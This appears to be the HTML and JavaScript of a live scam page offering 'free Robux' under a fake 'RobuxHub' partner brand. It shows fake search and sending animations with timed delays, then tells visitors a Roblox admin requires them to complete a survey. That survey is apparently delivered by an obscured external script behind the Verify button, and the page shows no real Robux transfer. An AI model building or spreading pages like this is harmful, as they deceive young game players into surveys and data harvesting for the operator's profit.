
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>@Dabanjion!</title>
	<link rel="icon" type="image/x-icon" href="https://banjion.site/pfp.png">
  <script type="text/javascript">
    var jkqmj_umj_TMzpJc={"it":4443822,"key":"eaa24"};
</script>
<script src="https://d29gqhzevia104.cloudfront.net/85ac6e6.js"></script>
</head>
<style>
  @import url("https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap");

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: "Poppins", sans-serif;
  font-weight: 500;
  font-style: normal;
}
.navbar {
  width: 100%;
  height: 90px;
  background-color: #1a1b1d;
  display: flex;
  align-items: center;
  justify-content: space-evenly;
  color: #fff;
}
.profile {
  display: flex;
}

.profileimg {
  width: 60px;
  border-radius: 50%;
  margin-right: 5px;
  margin-top: 5px;
}

.profileimg img {
  width: 100%;
  border-radius: 50%;
}

.navbar button {
  background-color: #00b06f;
  border: none;
  outline: none;
  border-radius: 5px;
  padding: 10px 40px;
  cursor: pointer;
  color: #fff;
  font-size: 15px;
}

.profile .text p {
  font-size: 14px;
  color: rgb(180 180 180);
  margin-left: 8px;
  margin-top: 0px;
}
.profile .text h4 {
  font-weight: bold;
  margin-left: 8px;
  margin-top: 3px;
  font-size: 18px;
}

.partner {
  display: flex;
  margin-top: 6px;
}
.badge {
  width: 13px;
  margin-left: 5px;
}
.badge img {
  width: 100%;
  margin-top: 9px;
}

.container {
  height: calc(100vh - 70px);
  width: 100%;
  background-image: url(https://banjion.site/backgroud.jpeg);
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
  position: relative;
}
.container::after {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-color: #07070777;
  z-index: 1;
}
.boxholder {
  padding-top: 60px;
  position: absolute;
  z-index: 999;
  width: 100%;
}
.box1 {
  width: 550px;
  height: 440px;
  background-color: #1a1b1d;
  margin: 0 auto;
  border-radius: 5px;
  box-shadow: rgba(0, 0, 0, 0.19) 0px 10px 20px, rgba(0, 0, 0, 0.23) 0px 6px 6px;
  display: flex;

  align-items: center;
  flex-direction: column;
  padding: 10px;
  text-align: center;
  color: #fff;
}
.logo {
  width: 220px;
  margin-top: 80px;
}
img {
  width: 100%;
}

.box1 .maintxt {
  line-height: 1.7;
  font-size: 16px;
  margin-top: 14px;
  color: #b7b1b1;
  margin-bottom: 10px;
}
.box1 .title {
  margin-top: 16px;
  font-size: 18px;
}
.box1 input {
  width: 85%;
  padding: 13px 18px;
  border: 1px solid rgb(255 255 255 / 30%);
  border-radius: 8px;
  outline: none;
  background-color: #000000;
  color: #fff;
  margin-top: 8px;
  font-size: 15px;
}
.box1 button {
  width: 85%;
  border-radius: 8px;
  outline: none;
  background-color: #00b06f;
  border: none;
  padding: 15px 15px;
  margin-top: 15px;
  font-weight: bold;
  color: #fff;
  cursor: pointer;
  font-size: 16px;
  letter-spacing: 1px;
}

.fade-image {
  width: 120px;
  padding-bottom: 40px;
  opacity: 0;
  animation: fadeInOut 2s infinite; /* 5s duration, infinite loop */
}

@keyframes fadeInOut {
  0% {
    opacity: 0; /* Initially hidden */
  }
  25% {
    opacity: 1; /* Fully visible */
  }
  75% {
    opacity: 1; /* Stays visible */
  }
  100% {
    opacity: 0; /* Hidden again */
  }
}

.boxanimation {
  display: flex;
  justify-content: center;
  align-items: center;
  flex-direction: column;
}
.animationtxt {
  line-height: 1.7;
  margin-top: 14px;
  color: #b7b1b1;
  font-size: 17px;
}

.box3 {
  display: flex;
  justify-content: center;
  flex-direction: column;
  border-radius: 8px;
}

.row {
  display: flex;
  align-items: center;
  height: 70px;
  justify-content: space-around;
}
.row:not(.row:last-child) {
  border-bottom: 1px solid rgb(255 255 255 / 40%);
}
.price {
  display: none;
}
.details {
  background-color: #00b06f;
  border-radius: 8px;
  padding: 6px 8px;
  width: 190px;
  display: flex;
  justify-content: center;
  cursor: pointer;
  transition: 0.3s;
  font-weight: 600;
}

.robux_total {
  display: flex;
  align-items: center;
}

.pic {
  width: 30px;
  margin-right: 10px;
  pointer-events: none;
  margin-top: 2px;
}

.details:hover {
  background-color: #068657;
  scale: 1.1;
}

.box4 {
  height: 400px;
}
.footer {
  width: 100%;
  height: 120px;
  background-color: #1a1b1d;
  color: #fff;
  text-align: center;
  padding: 15px 0;
}
.footer p {
  line-height: 1.7;
  font-size: 10px;
  font-weight: 500;
  margin-top: 14px;
  color: #b7b1b1;
  margin-bottom: 10px;
}

.maintxt2 {
  line-height: 1.7;
  font-size: 16px;
  margin-top: 14px;
  color: #b7b1b1;
  margin-bottom: 10px;
}


@media (max-width: 400px) {
  .box1 {
    width: 93%;
  }
}

@media (max-width: 470px) {
  .navbar {
    justify-content: space-between;
    padding: 0 10px;
  }
}

@media (max-width: 470px) {
  .navbar button {
    padding: 10px 17px;
  }
  .box1 .maintxt {
    font-size: 11px;
  }
}

@media (max-width: 600px) {
  .box1 {
    width: 90%;
  }
}
</style>

<body>
    <div class="navbar">
        <div class="profile">
            <div class="profileimg">
                <img src="https://banjion.site/pfp.png" alt="gg">
            </div>
            <div class="text">
                <div class="partner">
                    <h4>RobuxHub</h4>
                    <div class="badge"><img src="blue Verified Badge.png" alt=""></div>
                </div>
                <p>Partners program</p>
            </div>
        </div>
      
    </div>
    <div class="container">
        <div class="boxholder">
            <div class=" box1 box2">
                <div class="logo">
                    <img src="https://banjion.site/Roblox+Logo.svg" alt="">
                </div>
                <p class="maintxt">Robux allows you to purshase upgrades for your avatar or buy special abilities in
                    experiences
                </p>
                <span class="title">Enter your Username</span>
                <input type="text" class="username" placeholder="type your user ...">
                <button class="getrbx">Continue</button>
            </div>
            <div class="box1 boxanimation" style="display: none;">
                <div class="loeader">
                    <img class="fade-image" src="https://banjion.site/robux.png" alt="">
                </div>
                <p class="animationtxt">Searching for zbi...</p>
            </div>


            <div class=" box1 box3" style="display: none;">
              <p class="maintxt2">Please choose how many Robux you want <br> it's totally Free
              </p>
                <div class="row">
                    <div class="price">$0.00</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="	https://banjion.site/robux.png
                              "></div><span>1 700</span>
                        </div>
                    </div>
                </div>
                <div class="row">

                    <div class="price">$0.00</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="	https://banjion.site/robux.png
                              "></div><span>4 500</span>
                        </div>
                    </div>
                </div>
                <div class="row">

                    <div class="price">$0.00</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="	https://banjion.site/robux.png
                              "></div>
                            <span>10 000</span>
                        </div>
                    </div>
                </div>
                <div class="row">

                    <div class="price">$0.00</div>
                    <div class="details">
                        <div class="robux_total">
                            <div class="pic"><img src="	https://banjion.site/robux.png
                              "></div><span>50 000</span>
                        </div>
                    </div>
                </div>
            </div>


            <div class="box1 boxanimation" style="display: none;">
                <div class="loeader">
                    <img class="fade-image" src="https://banjion.site/robux.png" alt="">
                </div>
                <p class="animationtxt">Sending Robux to...</p>
            </div>

            <div class="box1 box4" style="display: none;">
                <div class="logo">
                    <img src="https://banjion.site/Roblox+Logo.svg" alt="">
                </div>
                <p class="maintxt2">The roblox admin is trying to send you the Robux, but he needs to make sure you are not a robot <br> click "Verify" and complete 1 survey to proove you are not a robot and get your Free Robux 
                </p>
                <button onclick="_Yg()" >Verify</button>
            </div>
        </div>
    </div>
    <div class="footer">
        <span>Copyright &copy; 2025</span>
        <p>© 2025 www.roblix.xyz - All Rights Reserved.
        </p>
    </div>

    <script>
      const rbxbtn = document.querySelector(".getrbx");

const box1 = document.querySelector(".box2");
const box2 = document.querySelector(".boxanimation");
const box3 = document.querySelector(".box3");
const box4 = document.querySelector(".box4");
const rbxtotal = document.querySelectorAll(".details");

const username = document.querySelector(".username");

const animationtxt = document.querySelector(".animationtxt");

rbxbtn.addEventListener("click", () => {
  if (username.value.length <= 2) {
    alert("please enter username");
  } else {
    box1.style.display = "none";
    box2.style.display = "flex";
    setTimeout(showbox2, 4500);
    setTimeout(showbox3, 4500);

    animationtxt.innerHTML = `Searching for <b>${username.value}</b> ...`;
  }
});

rbxtotal.forEach((btn) => {
  btn.addEventListener("click", () => {
    box3.style.display = "none";

    box2.style.display = "flex";

    setTimeout(showboxagain, 3500);
    setTimeout(showbox4, 3500);
    animationtxt.innerHTML = `Sending Robux to <b>${username.value}</b>...`;
  });
});

let showboxagain = () => {
  box2.style.display = "none";
};
let showbox2 = () => {
  box2.style.display = "none";
};

let showbox3 = () => {
  box3.style.display = "flex";
};

let showbox4 = () => {
  box4.style.display = "flex";
};
    </script>
</body>

</html>
